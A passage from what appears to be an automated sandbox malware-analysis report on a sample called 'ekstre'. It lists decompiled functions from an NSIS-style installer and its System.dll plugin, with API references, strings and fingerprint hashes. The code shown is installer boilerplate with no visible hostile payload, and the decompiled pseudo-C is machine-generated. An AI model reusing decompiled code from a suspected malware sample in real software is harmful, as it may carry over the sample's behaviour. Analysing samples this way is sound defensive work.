				E004066A5(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x41e5f8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000), ref: 004068A4

CreateFontIndirectW.GDI32(0041E5F8), ref: 00401ED3

Strings

Times New Roman, xrefs: 00401EB9

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID: Times New Roman
API String ID: 2584051700-927190056
Opcode ID: ac47535880b9863beca2078bf34556c07f4f5ebffc560490134b37c357c9fcbe
Instruction ID: 36bed5ab4faf7b9a1f757ca6c78a105dea61272c2268030551a41d9a6dd48de5
Opcode Fuzzy Hash: ac47535880b9863beca2078bf34556c07f4f5ebffc560490134b37c357c9fcbe
Instruction Fuzzy Hash: 3A01D475900261AFEB005BB5AD0EBDA7FB0AB25305F50C83AF941B71E2CAB90044CB2C

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, "true", 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x470270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fd3
0x00402fd8
0x00402fda
0x00402fda
0x00402fe5
0x00402ff5
0x00403007
0x00403007
0x0040300f

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32(?,?), ref: 00402FF5
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007

Strings

unpacking data: %d%%, xrefs: 00402FD3, 00402FE3
verifying installer: %d%%, xrefs: 00402FDA

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 122dbfa73d189dec6b584737e36c9d6329801f9922e0a46e077e2d4fb5e8edf8
Instruction ID: c9ba9f1a6d93a88d7e45fda5c825515dfdbc732e58bea81489804385b4326db2
Opcode Fuzzy Hash: 122dbfa73d189dec6b584737e36c9d6329801f9922e0a46e077e2d4fb5e8edf8
Instruction Fuzzy Hash: 52F0497050020DABEF246F60DD49BEA3B69FB00309F00803AF605B51D0DFBD99559F59

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD2209 Relevance: 9.1, APIs: 6, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6DDD2209(intOrPtr* _a4) {
				intOrPtr* _t23;
				signed int _t24;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E6DDD12F8();
				_t23 = _a4;
				_t33 =  *((intOrPtr*)(_t23 + 0x1014));
				_t42 = (_t33 + 0x81 << 5) + _t23;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t24 =  *(_t42 - 8) & 0x000000ff;
					if(_t24 <= 7) {
						switch( *((intOrPtr*)(_t24 * 4 +  &M6DDD2331))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x6ddd4064 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x6ddd4084 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E6DDD149E(__ecx);
								goto L16;
							case 3:
								__ecx =  *0x6ddd5040;
								__ecx - 1 = MultiByteToWideChar(0, 0,  *__edx, __ecx, __edi, __ecx - 1);
								__eax =  *0x6ddd5040;
								__ecx = 0;
								 *((short*)(__edi + __eax * 2 - 2)) = __cx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__edx,  *0x6ddd5040);
								goto L17;
							case 5:
								_push( *0x6ddd5040);
								_push(__edi);
								_push( *__edx);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6ddd4058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14));
					}
					_t25 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E6DDD1638(_t25 - 1, _t39);
								goto L26;
							}
						} else {
							E6DDD15EB(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}

0x6ddd2211
0x6ddd2213
0x6ddd2217
0x6ddd2226
0x6ddd2228
0x6ddd222d
0x6ddd222d
0x6ddd2235
0x6ddd223c
0x6ddd2242
0x00000000
0x6ddd224b
0x00000000
0x00000000
0x6ddd2253
0x6ddd2257
0x6ddd2259
0x6ddd225a
0x6ddd2265
0x6ddd2269
0x6ddd2269
0x6ddd2270
0x00000000
0x00000000
0x6ddd2273
0x6ddd2274
0x6ddd2277
0x6ddd2279
0x00000000
0x00000000
0x6ddd2280
0x6ddd2292
0x6ddd2298
0x6ddd229d
0x6ddd229f
0x00000000
0x00000000
0x6ddd22c0
0x00000000
0x00000000
0x6ddd22a6
0x6ddd22ac
0x6ddd22ad
0x6ddd22af
0x00000000
0x00000000
0x6ddd22c8
0x6ddd22ca
0x6ddd22d0
0x6ddd22d6
0x6ddd22d6
0x00000000
0x00000000
0x6ddd2242
0x6ddd22d9
0x6ddd22dd
0x6ddd22f1
0x6ddd22f1
0x6ddd22f7
0x6ddd22fc
0x6ddd2301
0x6ddd230d
0x6ddd2312
0x00000000
0x6ddd2317
0x6ddd2303
0x6ddd2304
0x6ddd2318
0x6ddd2318
0x6ddd2301
0x6ddd2319
0x6ddd231c
0x6ddd231c
0x6ddd232f

APIs

Part of subcall function 6DDD12F8: GlobalAlloc.KERNELBASE(00000040,?,6DDD11C4,-000000A0), ref: 6DDD1302

GlobalFree.KERNEL32(00000000), ref: 6DDD22F1
GlobalFree.KERNEL32(00000000), ref: 6DDD2326

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 1d9712a3d6fe972403da1b5f3348091e97a68c687c4ea8ac3323af2763a7c99c
Instruction ID: 5dcf9f24866f78d4199ef4758080b28609ccb08d0ae0b11f1b5bebda1fed8182
Opcode Fuzzy Hash: 1d9712a3d6fe972403da1b5f3348091e97a68c687c4ea8ac3323af2763a7c99c
Instruction Fuzzy Hash: 8B31E031288102DBEF76BF68C844F3ABFB8FB4B319B80412DF581DA054D7259444DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402950(void* __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x470274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029e7
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: b9454a1c55cf3e81adc8a3a6b2e2407f842ed149be3e8be0b26dafa41642de86
Instruction ID: 077c8a1089876a2b69c11771c405f0c752a0dc2f655da71f113ca60978626231
Opcode Fuzzy Hash: b9454a1c55cf3e81adc8a3a6b2e2407f842ed149be3e8be0b26dafa41642de86
Instruction Fuzzy Hash: 0831B172D00124BBCF216FA9CE89D9EBE79AF09364F10023AF561762E1CB794D419B58

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD10C7 Relevance: 8.9, APIs: 7, Instructions: 162
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDD10C7(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				signed int _t31;
				void* _t32;
				signed int _t34;
				void* _t39;
				void* _t46;
				intOrPtr _t55;
				void* _t59;
				void* _t66;
				void* _t67;
				signed short _t70;
				void* _t71;
				void* _t78;
				signed short _t79;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				signed int _t89;
				void* _t91;
				void _t94;
				void _t95;
				void* _t96;
				void* _t98;
				void* _t100;

				 *0x6ddd5040 = _a8;
				 *0x6ddd503c = _a16;
				 *0x6ddd5038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6ddd5014, E6DDD132B, _t85, _t88);
				_t89 =  *0x6ddd5040 * 0x28;
				_v0 = _t89;
				_t96 = E6DDD1593();
				_a8 = _t96;
				_t86 = _t96;
				_t70 = _v0 & 0x0000ffff;
				if(_t70 != 0) {
					_t83 = 0xa;
					do {
						_t31 = _t70 & 0x0000ffff;
						_t86 = _t86 + 2;
						_t100 = _t31 - 0x66;
						if(_t100 > 0) {
							_t32 = _t31 - 0x6c;
							if(_t32 == 0) {
								goto L24;
							} else {
								_t39 = _t32 - 4;
								if(_t39 == 0) {
									goto L13;
								} else {
									_t46 = _t39;
									if(_t46 == 0) {
										goto L11;
									} else {
										goto L8;
									}
								}
							}
						} else {
							if(_t100 == 0) {
								_t78 =  *0x6ddd503c;
								_t91 =  *_t78;
								 *_t78 =  *_t91;
								_t79 = _v0;
								_t55 =  *((intOrPtr*)(_t79 + 0xc));
								_a12 = _t55;
								if( *((intOrPtr*)(_t91 + 4)) == 0x2691) {
									E6DDD132E(_t79, _t91 + 8, 0x38);
									_t79 = _v0;
									_t98 = _t98 + 0xc;
									_t55 = _a12;
								}
								 *((intOrPtr*)(_t79 + 0xc)) = _t55;
								GlobalFree(_t91);
								goto L16;
							} else {
								_t59 = _t31 - 0x46;
								if(_t59 == 0) {
									_t95 = GlobalAlloc(0x40, 8 +  *0x6ddd5040 * 2);
									 *((intOrPtr*)(_t95 + 4)) = 0x2691;
									_t15 = _t95 + 8; // 0x8
									E6DDD132E(_t15, _v0, 0x38);
									 *_t95 =  *( *0x6ddd503c);
									 *( *0x6ddd503c) = _t95;
									goto L15;
								} else {
									_t66 = _t59 - 6;
									if(_t66 == 0) {
										L24:
										_t33 =  *0x6ddd5010;
										if( *0x6ddd5010 != 0) {
											E6DDD132E( *0x6ddd5038, _t33 + 4, _t89);
											_t71 =  *0x6ddd5010;
											_t98 = _t98 + 0xc;
											 *0x6ddd5010 =  *_t71;
											GlobalFree(_t71);
											goto L26;
										}
									} else {
										_t67 = _t66 - 4;
										if(_t67 == 0) {
											 *_t86 =  *_t86 + _t83;
											L13:
											GlobalFree(E6DDD15EB(E6DDD1548(( *_t86 & 0x0000ffff) - 0x30)));
											_t86 = _t86 + 2;
											goto L26;
										} else {
											_t46 = _t67;
											if(_t46 == 0) {
												 *_t86 =  *_t86 + _t83;
												L11:
												GlobalFree(E6DDD1638(( *_t86 & 0x0000ffff) - 0x30, E6DDD1593()));
												_t86 = _t86 + 2;
												goto L16;
											} else {
												L8:
												if(_t46 == 1) {
													_t94 = GlobalAlloc(0x40, _t89 + 4);
													_t11 = _t94 + 4; // 0x4
													E6DDD132E(_t11,  *0x6ddd5038, _v0);
													 *_t94 =  *0x6ddd5010;
													 *0x6ddd5010 = _t94;
													L15:
													_t98 = _t98 + 0xc;
													L16:
													_t89 = _v0;
													L26:
													_t83 = 0xa;
												}
											}
										}
									}
								}
							}
						}
						_t34 =  *_t86 & 0x0000ffff;
						_t70 = _t34;
					} while (_t34 != 0);
					_t96 = _a8;
				}
				return GlobalFree(_t96);
			}

0x6ddd10cd
0x6ddd10d7
0x6ddd10e1
0x6ddd10f5
0x6ddd10f8
0x6ddd10ff
0x6ddd110e
0x6ddd1110
0x6ddd1114
0x6ddd1116
0x6ddd111d
0x6ddd1129
0x6ddd112a
0x6ddd112a
0x6ddd112d
0x6ddd1130
0x6ddd1133
0x6ddd1260
0x6ddd1263
0x00000000
0x6ddd1265
0x6ddd1265
0x6ddd1268
0x00000000
0x6ddd126e
0x6ddd126f
0x6ddd1272
0x00000000
0x6ddd1278
0x00000000
0x6ddd1278
0x6ddd1272
0x6ddd1268
0x6ddd1139
0x6ddd1139
0x6ddd1221
0x6ddd122c
0x6ddd1230
0x6ddd1232
0x6ddd1235
0x6ddd1238
0x6ddd1240
0x6ddd1249
0x6ddd124e
0x6ddd1251
0x6ddd1254
0x6ddd1254
0x6ddd1259
0x6ddd125c
0x00000000
0x6ddd113f
0x6ddd113f
0x6ddd1142
0x6ddd11ec
0x6ddd11f5
0x6ddd11f8
0x6ddd11ff
0x6ddd120c
0x6ddd1213
0x00000000
0x6ddd1148
0x6ddd1148
0x6ddd114b
0x6ddd127d
0x6ddd127d
0x6ddd1284
0x6ddd1291
0x6ddd1296
0x6ddd129c
0x6ddd12a2
0x6ddd12a7
0x00000000
0x6ddd12a7
0x6ddd1151
0x6ddd1151
0x6ddd1154
0x6ddd11b5
0x6ddd11b8
0x6ddd11cd
0x6ddd11cf
0x00000000
0x6ddd1156
0x6ddd1157
0x6ddd115a
0x6ddd1196
0x6ddd1199
0x6ddd11ae
0x6ddd11b0
0x00000000
0x6ddd115c
0x6ddd115c
0x6ddd115f
0x6ddd1175
0x6ddd117d
0x6ddd1181
0x6ddd118c
0x6ddd118e
0x6ddd1215
0x6ddd1215
0x6ddd1218
0x6ddd1218
0x6ddd12a9
0x6ddd12ab
0x6ddd12ab
0x6ddd115f
0x6ddd115a
0x6ddd1154
0x6ddd114b
0x6ddd1142
0x6ddd1139
0x6ddd12ac
0x6ddd12af
0x6ddd12b1
0x6ddd12ba
0x6ddd12ba
0x6ddd12c5

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6DDD116B
GlobalFree.KERNEL32(00000000), ref: 6DDD11AE
GlobalFree.KERNEL32(00000000), ref: 6DDD11CD
GlobalAlloc.KERNEL32(00000040,?), ref: 6DDD11E6
GlobalFree.KERNEL32 ref: 6DDD125C
GlobalFree.KERNEL32(?), ref: 6DDD12A7
GlobalFree.KERNEL32(00000000), ref: 6DDD12BF

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 349e89049854658799855994caab7f7f70caf6b0543d5b167298f7f437208161
Instruction ID: d8796eb9a60bc7a2ce2c25f6a3a83f4555835ce727d868b8ac900dc0b79cbdd9
Opcode Fuzzy Hash: 349e89049854658799855994caab7f7f70caf6b0543d5b167298f7f437208161
Instruction Fuzzy Hash: 48517E75684202DFEF90EFA8D841E3A7BB8FF4A304B004529F998D7258D735E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x446748, 0x446748, _a8);
				wsprintfW(_t34 + lstrlenW(0x446748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x468238, _a4, 0x446748);
			}

0x00404e7a
0x00404e7f
0x00404e87
0x00404e88
0x00404e95
0x00404e9d
0x00404e9e
0x00404ea0
0x00404ea2
0x00404ea4
0x00404ea7
0x00404ea7
0x00404eae
0x00404eb4
0x00404eb4
0x00404ebb
0x00404ec2
0x00404ec5
0x00404ec8
0x00404ec8
0x00404ecc
0x00404edc
0x00404ede
0x00404ee1
0x00404e8a
0x00404e8a
0x00404e91
0x00404e91
0x00404ee9
0x00404ef4
0x00404f0a
0x00404f1b
0x00404f37

APIs

lstrlenW.KERNEL32(00446748,00446748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
wsprintfW.USER32 ref: 00404F1B
SetDlgItemTextW.USER32(?,00446748), ref: 00404F2E

Strings

HgD, xrefs: 00404F04
%u.%u%s%s, xrefs: 00404EFC

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$HgD
API String ID: 3540041739-1438095033
Opcode ID: dd91c97f61e0edca442968ff0a547df02f516e974e5ee7bfc946f90f446ecad6
Instruction ID: 9ed9f44d4dfc92f2d82021de947587b6db985542d3d956de1549965f0cce5e41
Opcode Fuzzy Hash: dd91c97f61e0edca442968ff0a547df02f516e974e5ee7bfc946f90f446ecad6
Instruction Fuzzy Hash: F611EB735041283BEB00A5ADDC45E9F3298EB81338F150637FA26F71D1EA7DC82182D8

Uniqueness

Uniqueness Score: -1.00%

Function 004068EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

